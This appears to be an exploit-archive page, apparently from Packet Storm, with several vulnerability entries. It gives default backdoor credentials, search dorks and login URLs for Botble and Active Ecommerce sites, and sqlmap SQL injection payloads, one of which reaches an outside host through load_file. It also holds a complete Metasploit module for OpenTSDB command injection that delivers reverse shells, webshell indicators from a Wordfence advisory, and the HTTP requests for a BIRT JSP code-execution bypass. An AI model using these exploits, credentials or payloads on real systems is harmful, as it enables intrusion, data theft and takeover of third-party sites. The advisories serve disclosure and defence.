Botble version 5.28.3 has been reported as having a default backdoor account.

    ====================================================================================================================================| # Title     : Botble 5.28.3 Backdoor Account Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit)                                              | | # Vendor    : hhttps://codecanyon.net/item/botble-cms-php-platform-based-on-laravel-framework/16928182                           |  | # Dork      : "Botble Technologies. All right reserved."                                                                         |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : user=botble  & pass=159357 [+] https://cms.botble.com/admin/loginGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

Botble 5.28.3 Backdoor Account

Active Ecommerce CMS version 6.4.0 has been reported as having a default backdoor account.

    ====================================================================================================================================| # Title     : Active ecommerce cms v6.4.0 Backdoor Account Vulnerability                                                         || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(64-bit)                                              | | # Vendor    : https://codecanyon.net/item/active-ecommerce-cms/23471405?s_rank=24                                                |  | # Dork      : "category/beauty-health-hair"                                                                                      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : user=admin@example.com  & pass=123456 [+] https://www.sbeshopping.com/loginGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

Active Ecommerce CMS 6.4.0 Backdoor Account

Student Attendance Management System version 1.0 from Erick O. Omundi suffers from multiple remote SQL injection vulnerabilities.

    ## Title: Student-Attendance-Management-System 1.0 from Erick O. Omundi Multiple-SQLi## Author: nu11secur1ty## Date: 12.25.2022## Vendor: https://github.com/rickxy## Software: https://github.com/rickxy/Student-Attendance-Management-System## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rickxy/2022/Student-Attendance-Management-System## Description:The `username` parameter appears to be vulnerable to Multiple-SQLinjection attacks.The attacker can retrieve all sensitive information about the users ofthis system and more bad things.## STATUS: CRITICAL Vulnerability[+] Payload:```MySQL---Parameter: username (POST)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BYor GROUP BY clause    Payload: userType=Administrator&username=lBPxXeUT'+(selectload_file('\\\\eq8r4p3b9u6gn42v38f6ca4cf3lw9oxf03sqje8.erick_from_America.com\\khw'))+''RLIKE (SELECT (CASE WHEN (6217=6217) THEN 0x6c42507858655554+(selectload_file(0x5c5c5c5c6571387234703362397536676e343276333866366361346366336c77396f7866303373716a65382e657269636b5f66726f6d5f416d65726963612e636f6d5c5c6b6877))+''ELSE 0x28 END)) AND 'FUJm'='FUJm&password=q2H!z4n!F1&login=Login    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: userType=Administrator&username=lBPxXeUT'+(selectload_file('\\\\eq8r4p3b9u6gn42v38f6ca4cf3lw9oxf03sqje8.erick_from_America.com\\khw'))+''AND (SELECT 8687 FROM (SELECT(SLEEP(7)))btHE) AND'XFcq'='XFcq&password=q2H!z4n!F1&login=Login---```## Reproduce:[href]()https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rickxy/2022/Student-Attendance-Management-System## Proof and Exploit:[href](https://streamable.com/goy6ka)## Time spent`00:30:00`

Student Attendance Management System 1.0 SQL Injection

The ProLink PRS1841 home router suffers from having a backdoor account.

ProLink PRS1841 PLDT Router Backdoor

This Metasploit module exploits an unauthenticated command injection vulnerability in the yrange parameter in OpenTSDB through 2.4.0 (CVE-2020-35476) in order to achieve unauthenticated remote code execution as the root user. The module first attempts to obtain the OpenTSDB version via the api. If the version is 2.4.0 or lower, the module performs additional checks to obtain the configured metrics and aggregators. It then randomly selects one metric and one aggregator and uses those to instruct the target server to plot a graph. As part of this request, the yrange parameter is set to the payload, which will then be executed by the target if the latter is vulnerable. This module has been successfully tested against OpenTSDB version 2.3.0.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'OpenTSDB 2.4.0 unauthenticated command injection',        'Description' => %q{          This module exploits an unauthenticated command injection          vulnerability in the yrange parameter in OpenTSDB through          2.4.0 (CVE-2020-35476) in order to achieve unauthenticated          remote code execution as the root user.          The module first attempts to obtain the OpenTSDB version via          the api. If the version is 2.4.0 or lower, the module          performs additional checks to obtain the configured metrics          and aggregators. It then randomly selects one metric and one          aggregator and uses those to instruct the target server to          plot a graph. As part of this request, the yrange parameter is          set to the payload, which will then be executed by the target          if the latter is vulnerable.          This module has been successfully tested against OpenTSDB          version 2.3.0.        },        'License' => MSF_LICENSE,        'Author' => [          'Shai rod', # @nightrang3r - discovery and PoC          'Erik Wynter' # @wyntererik - Metasploit        ],        'References' => [          ['CVE', '2020-35476'],          ['URL', 'https://github.com/OpenTSDB/opentsdb/issues/2051'] # disclosure and PoC        ],        'DefaultOptions' => {          'RPORT' => 4242        },        'Platform' => %w[unix linux],        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],        'CmdStagerFlavor' => %w[bourne curl wget],        'Targets' => [          [            'Automatic (Unix In-Memory)',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' },              'Type' => :unix_memory            }          ],          [            'Automatic (Linux Dropper)',            {              'Platform' => 'linux',              'Arch' => [ARCH_X86, ARCH_X64],              'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' },              'Type' => :linux_dropper            }          ]        ],        'Privileged' => true,        'DisclosureDate' => '2020-11-18',        'DefaultTarget' => 1,        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],          'Reliability' => [ REPEATABLE_SESSION ]        }      )    )    register_options [      OptString.new('TARGETURI', [true, 'The base path to OpenTSDB', '/']),    ]  end  def check    # sanity check to see if the target is likely OpenTSDB    res1 = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path)    })    unless res1      return CheckCode::Unknown('Connection failed.')    end    unless res1.code == 200 && res1.get_html_document.xpath('//title').text.include?('OpenTSDB')      return CheckCode::Safe('Target is not an OpenTSDB application.')    end    # get the version via the api    res2 = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'api', 'version')    })    unless res2      return CheckCode::Unknown('Connection failed.')    end    unless res2.code == 200 && res2.body.include?('version')      return CheckCode::Detected('Target may be OpenTSDB but the version could not be determined.')    end    begin      parsed_res_body = JSON.parse(res2.body)    rescue JSON::ParserError      return CheckCode::Detected('Could not determine the OpenTSDB version: the HTTP response body did not match the expected JSON format.')    end    unless parsed_res_body.is_a?(Hash) && parsed_res_body.key?('version')      return CheckCode::Detected('Could not determine the OpenTSDB version: the HTTP response body did not match the expected JSON format.')    end    version = parsed_res_body['version']    begin      if Rex::Version.new(version) <= Rex::Version.new('2.4.0')        return CheckCode::Appears("The target is OpenTSDB version #{version}")      else        return CheckCode::Safe("The target is OpenTSDB version #{version}")      end    rescue ArgumentError => e      return CheckCode::Unknown("Failed to obtain a valid OpenTSDB version: #{e}")    end  end  def select_metric    # check if any metrics have been configured. if not, exploitation cannot work    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'suggest'),      'vars_get' => { 'type' => 'metrics' }    })    unless res      fail_with(Failure::Unknown, 'Connection failed.')    end    unless res.code == 200      fail_with(Failure::UnexpectedReply, "Received unexpected status code #{res.code} when checking the configured metrics")    end    begin      metrics = JSON.parse(res.body)    rescue JSON::ParserError      fail_with(Failure::UnexpectedReply, 'Received unexpected reply when checking the configured metrics: The response body did not contain valid JSON.')    end    unless metrics.is_a?(Array)      fail_with(Failure::UnexpectedReply, 'Received unexpected reply when checking the configured metrics: The response body did not contain a JSON array')    end    if metrics.empty?      fail_with(Failure::NoTarget, 'Failed to identify any configured metrics. This makes exploitation impossible')    end    # select a random metric since any will do    @metric = metrics.sample    print_status("Identified #{metrics.length} configured metrics. Using metric #{@metric}")  end  def select_aggregator    # check the configured aggregators and select one at random    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'aggregators')    })    unless res      fail_with(Failure::Unknown, 'Connection failed.')    end    unless res.code == 200      fail_with(Failure::UnexpectedReply, "Received unexpected status code #{res.code} when checking the configured aggregators")    end    begin      aggregators = JSON.parse(res.body)    rescue JSON::ParserError      fail_with(Failure::UnexpectedReply, 'Received unexpected reply when checking the configured aggregators: The response body did not contain valid JSON.')    end    unless aggregators.is_a?(Array)      fail_with(Failure::UnexpectedReply, 'Received unexpected reply when checking the configured aggregators: The response body did not contain a JSON array')    end    if aggregators.empty?      fail_with(Failure::NoTarget, 'Failed to identify any configured aggregators. This makes exploitation impossible')    end    # select a random aggregator since any will do    @aggregator = aggregators.sample    print_status("Identified #{aggregators.length} configured aggregators. Using aggregator #{@aggregator}")  end  def execute_command(cmd, _opts = {})    # use base64 to avoid special char escape hell (specifying BadChars did not help)    cmd = "'echo #{Base64.strict_encode64(cmd)} | base64 -d | /bin/sh'"    start_time = rand(20.year.ago..10.year.ago) # this should be a date far enough in the past to make sure we capture all possible data    start_value = start_time.strftime('%Y/%m/%d-%H:%M:%S')    end_time = rand(1.year.since..10.year.since) # this can be a date in the future to make sure we capture all possible data    end_value = end_time.strftime('%Y/%m/%d-%H:%M:%S')    get_vars = {      'start' => start_value,      'end' => end_value,      'm' => "#{@aggregator}:#{@metric}",      'yrange' => "[1:system(#{Rex::Text.uri_encode(cmd)})]",      'wxh' => "#{rand(800..1600)}x#{rand(400..600)}",      'style' => 'linespoint'    }    exploit_uri = '?'    get_vars.each do |key, value|      exploit_uri += "#{key}=#{value}&"    end    exploit_uri += 'json'    # using a raw request because cgi was leading to encoding issues    send_request_raw({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'q' + exploit_uri)    }, 0) # we don't have to wait for a reply here  end  def exploit    select_metric    select_aggregator    if target.arch.first == ARCH_CMD      print_status('Executing the payload')      execute_command(payload.encoded)    else      execute_cmdstager(background: true)    end  endend

OpenTSDB 2.4.0 Command Injection

Graudit is a simple script and signature sets that allows you to find potential security flaws in source code using the GNU utility, grep. It's comparable to other static analysis applications like RATS, SWAAT, and flaw-finder while keeping the technical requirements to a minimum and being very flexible.

GRAudit Grep Auditing Tool 3.5

WordPress Yith WooCommerce Gift Cards Premium plugin versions 3.19.0 and below suffer from a remote shell upload vulnerability.

Description: Unauthenticated Arbitrary File Upload

Affected Plugin: Yith WooCommerce Gift Cards Premium

Plugin Slug: yith-woocommerce-gift-cards-premium

Affected Versions: <= 3.19.0

CVE ID: CVE-2022-45359

CVSS Score: 9.8 (Critical)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N

Researcher/s:  Dave Jong

Fully Patched Version: 3.20.0

We were able to reverse engineer the exploit based on attack traffic and a copy of the vulnerable plugin and are providing information on its functionality as this vulnerability is already being exploited in the wild and a patch has been available for some time.

The issue lies in the import_actions_from_settings_panel function which runs on the admin_init hook.

Since admin_init runs for any page in the /wp-admin/ directory, it is possible to trigger functions that run on admin_init as an unauthenticated attacker by sending a request to /wp-admin/admin-post.php.

Since the import_actions_from_settings_panel function also lacks a capability check and a CSRF check, it is trivial for an attacker to simply send a request containing a page parameter set to yith_woocommerce_gift_cards_panel, a ywgc_safe_submit_field parameter set to importing_gift_cards, and a payload in the file_import_csv file parameter.

Since the function also does not perform any file type checks, any file type including executable PHP files can be uploaded.

Cyber Observables

These attacks may appear in your logs as unexpected POST requests to wp-admin/admin-post.php from unknown IP addresses. Additionally, we have observed the following payloads which may be useful in determining whether your site has been compromised. Note that we are providing normalized hashes (hashes of the file with all extraneous whitespace removed):

kon.php/1tes.php – this file loads a copy of the “marijuana shell” file manager in memory from a remote location at shell[.]prinsh[.]com and has a normalized sha256 hash of 1a3babb9ac0a199289262b6acf680fb3185d432ed1e6b71f339074047078b28c

b.php – this file is a simple uploader with a normalized sha256 hash of 3c2c9d07da5f40a22de1c32bc8088e941cea7215cbcd6e1e901c6a3f7a6f9f19

admin.php – this file is a password-protected backdoor and has a normalized sha256 hash of 8cc74f5fa8847ba70c8691eb5fdf8b6879593459cfd2d4773251388618cac90d

Although we’ve seen attacks from more than a hundred IPs, the vast majority of attacks were from just two IP addresses:

103.138.108.15, which sent out 19604 attacks against 10936 different sites

and

188.66.0.135, which sent 1220 attacks against 928 sites.

The majority of attacks occurred the day after the vulnerability was disclosed, but have been ongoing, with another peak on December 14, 2022. As this vulnerability is trivial to exploit and provides full access to a vulnerable website we expect attacks to continue well into the future.

Recommendations

If you are running a vulnerable version of YITH WooCommerce Gift Cards Premium, that is, any version up to and including 3.19.0, we strongly recommend updating to the latest version available. While the Wordfence firewall does provide protection against malicious file uploads even for free users, attackers may still be able to cause nuisance issues by abusing the vulnerable functionality in less critical ways.

If you believe your site has been compromised as a result of this vulnerability or any other vulnerability, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both of these products include hands-on support in case you need further assistance.

If you have any friends or colleagues who are using this plugin, please share this announcement with them and encourage them to update to the latest patched version of YITH WooCommerce Gift Cards Premium as soon as possible.

If you are a security researcher, you can responsibly disclose your finds to us and obtain a CVE ID and get your name on the Wordfence Intelligence Community Edition leaderboard.

WordPress Yith WooCommerce Gift Cards Premium 3.19.0 Shell Upload

Stock Management System 2022 version 1.0 from Erick Cesar suffers from a remote SQL injection vulnerability.

    ## Title: Stock-Management-System-2022-1.0-from-Erick-Cesar Multiple SQLi## Author: nu11secur1ty## Date: 12.22.2022## Vendor: https://github.com/rickxy/Stock-Management-System## Software: https://github.com/rickxy/Stock-Management-System## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rickxy/2022/Stock-Management-System-1.0## Description:The `user` parameter appears to be vulnerable to SQL injection attacks.The payload ' was submitted in the user parameter, and a databaseerror message was returned.The attacker can still all information for the system by using thisvulnerability.## STATUS: HIGH Vulnerability - CRITICAL[+] Payload:```MySQL---Parameter: user (POST)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BYor GROUP BY clause    Payload: user=bqxDgfIK' RLIKE (SELECT (CASE WHEN (8457=8457) THEN0x627178446766494b ELSE 0x28 END)) AND'BTvs'='BTvs&password=s9U!o7d!C0&btnlogin=    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: user=bqxDgfIK' AND (SELECT 5004 FROM(SELECTCOUNT(*),CONCAT(0x7178767071,(SELECT(ELT(5004=5004,1))),0x7171707a71,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND'aQfu'='aQfu&password=s9U!o7d!C0&btnlogin=    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: user=bqxDgfIK' AND (SELECT 8137 FROM(SELECT(SLEEP(7)))nCyy) AND 'vQsi'='vQsi&password=s9U!o7d!C0&btnlogin=---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rickxy/2022/Stock-Management-System-1.0)## Proof and Exploit:[href](https://streamable.com/gg7pyf)## Time spent`00:05:00`## Writing an exploit`00:05:00`

Stock Management System 2022 1.0 From Erick Cesar SQL Injection

cryptmount is a utility for creating and managing secure filing systems on GNU/Linux systems. After initial setup, it allows any user to mount or unmount filesystems on demand, solely by providing the decryption password, with any system devices needed to access the filing system being configured automatically. A wide variety of encryption schemes (provided by the kernel dm-crypt system and the libgcrypt library) can be used to protect both the filesystem and the access key. The protected filing systems can reside in either ordinary files or disk partitions. The package also supports encrypted swap partitions, and automatic configuration on system boot-up.

cryptmount Filesystem Manager 6.1.1

Eclipse Business Intelligence Reporting Tool versions 4.11.0 and below suffer from a bypass vulnerability that allows for remote code execution.

SEC Consult Vulnerability Lab Security Advisory < 20221216-0 >  
=======================================================================  
               title: Remote code execution - CVE-2021-34427 bypass  
             product: Eclipse Business Intelligence Reporting Tool (BiRT)  
  vulnerable version: <= 4.11.0  
       fixed version: 4.12  
          CVE number: CVE-2021-34427  
              impact: High  
            homepage: https://eclipse.github.io/birt-website/  
               found: 2022-10-05  
                  by: Armin Stock (Atos)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Atos company  
                      Europe | Asia | North America

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"With BIRT you can create data visualizations, dashboards and reports  
that can be embedded into web applications and rich clients. Make information out  
of your data!"

https://eclipse.github.io/birt-website/

Business recommendation:  
------------------------  
The vendor provides a patch which should be installed immediately.

Vulnerability overview/description:  
-----------------------------------  
1) Remote code execution - CVE-2021-34427 bypass  
The vulnerability described in CVE-2021-34427 (https://www.cvedetails.com/cve/CVE-2021-34427/)  
allows an attacker to execute code on the server, by creating a `.jsp` file  
with the `BiRT - WebViewerExample`. This was fixed with the following code:

-------------------------------------------------------------------------------  
// viewer/org.eclipse.birt.report.viewer/birt/WEB-INF/classes/org/eclipse/birt/report/context/ViewerAttributeBean.java#L1081  
  protected static void checkExtensionAllowedForRPTDocument(String rptDocumentName) throws ViewerException {  
    int extIndex = rptDocumentName.lastIndexOf(".");  
    String extension = null;  
    boolean validExtension = true;

    if (extIndex > -1 && (extIndex + 1) < rptDocumentName.length()) {  
      extension = rptDocumentName.substring(extIndex + 1);

      if (!disallowedExtensionsForRptDocument.isEmpty()  
          && disallowedExtensionsForRptDocument.contains(extension)) {  
        validExtension = false;  
      }

      if (!allowedExtensionsForRptDocument.isEmpty() && !allowedExtensionsForRptDocument.contains(extension)) {  
        validExtension = false;  
      }

      if (!validExtension) {  
        throw new ViewerException(BirtResources.getMessage(  
            ResourceConstants.ERROR_INVALID_EXTENSION_FOR_DOCUMENT_PARAMETER, new String[] { extension }));  
      }

    }  
  }  
-------------------------------------------------------------------------------

This fix can be easily bypassed by adding `/.` to the filename which allows  
an attacker to execute arbitrary code.

Proof of concept:  
-----------------  
1) Remote code execution - CVE-2021-34427 bypass  
The old exploit results in an error message:

-------------------------------------------------------------------------------  
GET /birt/document?__report=test.rptdesign&sample=<@urlencode_all><%  out.println("OS: " + System.getProperty("os.name"));  out.println("Current dir: " +   
getServletContext().getRealPath("/"));%><@/urlencode_all>&__document=<@urlencode>./test/info-new.jsp<@/urlencode> HTTP/1.1  
Host: IP:18080  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.8,de-DE;q=0.5,de;q=0.3  
Accept-Encoding: gzip, deflate  
Connection: close  
Cookie: JSESSIONID=C2A5FE509AD277742111569F8656881A  
Upgrade-Insecure-Requests: 1  
-------------------------------------------------------------------------------

Response:  
-------------------------------------------------------------------------------  
HTTP/1.1 200  
Set-Cookie: JSESSIONID=A1E37E7FEC80DFFF155CAF9F642ADEB7; Path=/birt; HttpOnly  
Content-Type: text/html;charset=utf-8  
Date: Wed, 05 Oct 2022 06:14:54 GMT  
Connection: close  
Content-Length: 4644

<html>  
<head>  
<title>Error</title>  
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8"/>  
</head>  
<body>  
<div id="birt_errorPage" style="color:red">  
<span id="error_icon"  style="cursor:pointer" onclick="if (document.getElementById('error_detail').style.display == 'none') { document.getElementById('error_icon').innerHTML = '- ';   
document.getElementById('error_detail').style.display = 'block'; }else { document.getElementById('error_icon').innerHTML = '+ '; document.getElementById('error_detail').style.display = 'none'; }" > +   
</span>

Invalid extension - "jsp" for the __document parameter.  
-------------------------------------------------------------------------------

But adding `/.` to the end of the filename creates the file on the server as  
before:

-------------------------------------------------------------------------------  
GET /birt/document?__report=test.rptdesign&sample=<@urlencode_all><%  out.println("OS: " + System.getProperty("os.name"));  out.println("Current dir: " +   
getServletContext().getRealPath("/"));%><@/urlencode_all>&__document=<@urlencode>./test/info-new.jsp/.<@/urlencode> HTTP/1.1  
Host: IP:18080  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.8,de-DE;q=0.5,de;q=0.3  
Accept-Encoding: gzip, deflate  
Connection: close  
Cookie: JSESSIONID=C2A5FE509AD277742111569F8656881A  
Upgrade-Insecure-Requests: 1

-------------------------------------------------------------------------------

-------------------------------------------------------------------------------  
HTTP/1.1 200  
Set-Cookie: JSESSIONID=5CC070E6E07D94816BF67A162E7DD8D2; Path=/birt; HttpOnly  
Content-Type: text/html;charset=utf-8  
Date: Wed, 05 Oct 2022 05:26:01 GMT  
Connection: close  
Content-Length: 283

<html><head><title>Complete</title><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8"></head>  
<body style="background-color: #ECE9D8;">  
<div style="font-size:10pt;"><font color="black">  
The report document file has been generated successfully.</font>  
</div></body></html>  
-------------------------------------------------------------------------------

This allows the execution of the provided `JSP` code, by calling  
`/birt/test/info-new.jsp`.

Vulnerable / tested versions:  
-----------------------------  
The following version has been tested, but all versions <= 4.11 are vulnerable.  
* 4.10.0 (2022-10-01)

Vendor contact timeline:  
------------------------  
2022-11-07: Vendor contacted via bugs.eclipse.org (https://bugs.eclipse.org/bugs/show_bug.cgi?id=580994)  
2022-11-17: Vendor confirmed the bypass and is working on a fix.  
2022-11-17: Vendor provided a fix.  
2022-11-27: The fix was tested and could be bypassed again.  
2022-11-27: Vendor acknowledged the bypass and provided a new fix.  
2022-11-28: The fix was tested and we were not able to bypass it.  
2022-11-30: Vendor releases patched version 4.12  
2022-12-16: Public release of security advisory.

Solution:  
---------  
Update Eclipse BIRT to version 4.12 or newer from the vendor's website:  
https://projects.eclipse.org/projects/technology.birt/releases/4.12.0

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult, an Atos company  
Europe | Asia | North America

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Atos company. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF Armin Stock / @2022

Source

Packet Storm